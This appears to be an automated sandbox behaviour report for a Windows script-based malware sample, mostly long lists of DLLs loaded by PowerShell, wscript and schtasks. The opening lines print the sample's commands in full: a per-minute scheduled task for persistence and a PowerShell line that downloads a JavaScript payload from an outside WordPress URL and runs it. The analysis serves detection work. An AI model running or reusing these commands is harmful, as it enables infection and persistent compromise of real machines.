      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /fJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\NDU462JA8L5M.jsJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\NDU462JA8L5M.js
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\NDU462JA8L5M.js
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
